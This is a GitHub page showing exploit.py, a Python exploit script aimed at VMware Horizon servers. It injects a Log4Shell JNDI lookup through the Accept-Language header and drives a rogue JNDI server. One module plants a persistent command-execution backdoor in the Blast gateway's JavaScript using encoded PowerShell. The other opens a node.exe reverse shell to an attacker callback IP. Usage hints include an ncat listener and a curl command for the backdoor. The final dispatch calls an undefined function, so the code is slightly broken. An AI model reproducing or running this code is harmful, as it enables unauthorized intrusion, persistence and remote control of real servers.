-
Notifications
You must be signed in to change notification settings - Fork 16
/
Copy pathexploit.py
153 lines (118 loc) · 7.27 KB
/
exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
import argparse
from urllib.parse import urlparse
import requests
from base64 import b64encode
import subprocess
import time
import os.path
import random
import string
from string import Template
import socket
# Dealing with SSL Warnings
try:
import requests.packages.urllib3
requests.packages.urllib3.disable_warnings()
except Exception:
pass
# Defining arguments
def args():
parser = argparse.ArgumentParser()
parser.add_argument("-t", "--url", dest="url", help="VMWare Horizon base URL", action='store', required=True)
parser.add_argument("-i", "--ip", dest="callback", help="Callback IP for payload delivery.", action='store', required=True)
parser.add_argument("-p", "--port", dest="port", help="Callback port for reverse shell.", action='store', required=False)
parser.add_argument("-r", "--revshell", dest="shell", help="Module to establish reverse shell", action='store_true', required=False)
parser.add_argument("-b", "--backdoor", dest="backdoor", help="Module to add backdoor", action='store_true', required=False)
args = parser.parse_args()
# Making sure port specified for reverse shell payload
if not args.port and args.shell == True:
print('[!] You did not specify a port. Re-run command with -p flag.')
exit()
else:
pass
# Making sure RogueJNDI exists on disk
if os.path.exists('./utils/rogue-jndi/target/RogueJndi-1.1.jar') == True:
pass
else:
print('[!] You have not compiled RogueJNDI.')
print('[!] See README.md for more information.')
exit()
# Making sure a real module was specified by the user
if args.backdoor== True:
print('[*] Implementing backdoor now...')
elif args.shell == True:
print(f'[*] Make sure an listener is started: ncat -lvnp {args.port}')
print('[*] Reverse shell payload executing now.')
else:
print('[!] You did not specify a valid module!')
exit()
return args.url, args.callback, args.port, args.shell, args.backdoor
def backdoor(url, callback):
# Building our URL
endpoint = f'https://{url}/portal/info.jsp'
url_path = ''.join(random.choices(string.ascii_lowercase, k = 25))
payload_header = ''.join(random.choices(string.ascii_lowercase, k = 5))
# Crafting backdoor
# If someone can figure out why this doesn't work i'll paypal you $20 USD
#backdoor = '''$path=gwmi win32_service|?{$_.Name -like "*PCOI*"}|%{$_.PathName -replace '"', '' -replace "bin\SecurityGateway.exe","appblastgateway\lib\\absg-worker.js"};$expr="req.connection.end();`r`n`t`t`t}`r`n`r`n`t`t`tif (String(req.url).includes('URL_PATH')) {`r`n`t`t`t`ttry {`r`n`t`t`t`t`treplyError(req, res, 200, require('child_process').execSync(`r`n`t`t`t`t`t`tBuffer.from(req.headers['HEADER'], 'base64').toString('ascii')`r`n`t`t`t`t`t).toString());`r`n`t`t`t`t}`r`n`t`t`t`tcatch (err) {`r`n`t`t`t`t`treplyError(req, res, 400, err.stderr.toString());`r`n`t`t`t`t}`r`n`t`t`t`treturn;";(Get-Content $path)|ForEach-Object {$_ -replace "req.connection.end\(\)\;", $expr}|Set-Content $path;$nssm=gwmi win32_service|?{$_.Name -like "*PCOI*"}|%{$_.PathName -replace '"', '' -replace "bin\SecurityGateway.exe","appblastgateway\\nssm.exe"};cmd.exe /C $nssm restart VMBlastSG'''
backdoor = '''$path="C:\Program Files\VMware\VMware View\Server\\appblastgateway\lib\\absg-worker.js";$expr="req.connection.end();`r`n`t`t`t}`r`n`r`n`t`t`tif (String(req.url).includes('URL_PATH')) {`r`n`t`t`t`ttry {`r`n`t`t`t`t`treplyError(req, res, 200, require('child_process').execSync(`r`n`t`t`t`t`t`tBuffer.from(req.headers['HEADER'], 'base64').toString('ascii')`r`n`t`t`t`t`t).toString());`r`n`t`t`t`t}`r`n`t`t`t`tcatch (err) {`r`n`t`t`t`t`treplyError(req, res, 400, err.stderr.toString());`r`n`t`t`t`t}`r`n`t`t`t`treturn;";(Get-Content $path)|ForEach-Object {$_ -replace "req.connection.end\(\)\;", $expr}|Set-Content $path;Restart-Service -Force VMBlastSG'''
# Inserting random header and URL path
header_replace = backdoor.replace('HEADER', payload_header)
url_replace = header_replace.replace('URL_PATH', url_path)
# Doing goofy encoding stuff for Powershell
# https://dariuszparys.github.io/posts/powershell-encodedcommand-from-bash-and-python/
encoded_bytes = b64encode(url_replace.encode('utf-16-le'))
encoded_string = str(encoded_bytes, 'utf-8')
# Starting rogue-jndi
print('[*] Starting malicous JNDI Server')
proc = subprocess.Popen(['timeout', '25s', 'java', '-jar', './utils/rogue-jndi/target/RogueJndi-1.1.jar', '--command', f'cmd.exe /c powershell -encodedcommand {encoded_string}', '--hostname', f'{callback}'],stdout=subprocess.DEVNULL,stderr=subprocess.STDOUT)
# Crafting our payload and headers
header = {
'Accept-Language': f'${{jndi:ldap://{callback}:1389/o=tomcat}}',
'User-Agent': 'Mozilla/5.0 (VMWare Horizon Exploit Attempt)'
}
# Sleeping for five seconds to prevent issues
time.sleep(5)
## Issuing request
print('[*] Firing payload!\n')
response = requests.get(endpoint, headers=header, verify=False)
# Seeing if VMBlastSG started successfully
print('[*] Checking to see if the VMBlastSG service started.')
print('[*] This can take up to 15 seconds.')
check = requests.get(f'https://{url}:8443/verify', verify=False, timeout=15)
if check.status_code == 404:
print('[*] Exploit successful!')
print(f'[*] Your backdoors path is: https://{url}:8443/{url_path}')
print(f'[*] Your backdoors header is: {payload_header}')
print(f'[*] Windows commands need to be Base64 encoded and issued in a cURL request similar to the one below:')
print(f'[*] curl -ski -H "{payload_header}: Y21kLmV4ZSAvYyBjYWxjLmV4ZQo=" https://{url}:8443/{url_path}')
else:
print(f'[!] Exploit failed! VMBlastSG service not successfully started or good firewall rules are in place.')
print(f'[!] Good luck next time!')
def revshell(url, callback, port):
# Building our URL
endpoint = f'https://{url}/portal/info.jsp'
# Crafting our headers
header = {
'Accept-Language': f'${{jndi:ldap://{callback}:1389/o=tomcat}}',
'User-Agent': 'Mozilla/5.0 (VMWare Horizon Exploit Attempt)'
}
# Crafting our reverse shell payload
payload = '''"C:\Program Files\VMware\VMware View\Server\\appblastgateway\\node.exe" -r net -e "sh = require('child_process').exec('cmd.exe');var client = new net.Socket();client.connect(PORT, 'IP', function(){client.pipe(sh.stdin);sh.stdout.pipe(client);sh.stderr.pipe(client);});"'''
port_replace = payload.replace('PORT', port)
ip_replace = port_replace.replace('IP', callback)
# Starting rogue-jndi
print('[*] Starting malicous JNDI Server')
proc = subprocess.Popen(['timeout', '25s', 'java', '-jar', './utils/rogue-jndi/target/RogueJndi-1.1.jar', '--command', f'{ip_replace}', '--hostname', f'{callback}'],stdout=subprocess.DEVNULL,stderr=subprocess.STDOUT)
# Sleeping for five seconds to prevent issues
time.sleep(5)
## Issuing request
print('[*] Firing payload!\n')
response = requests.get(endpoint, headers=header, verify=False)
print('[*] Check for a callback!')
url, callback, port, shell, backdoor = args()
# Picking what we are going to do
if backdoor is True:
exfil(url, callback)
elif shell is True:
revshell(url, callback, port)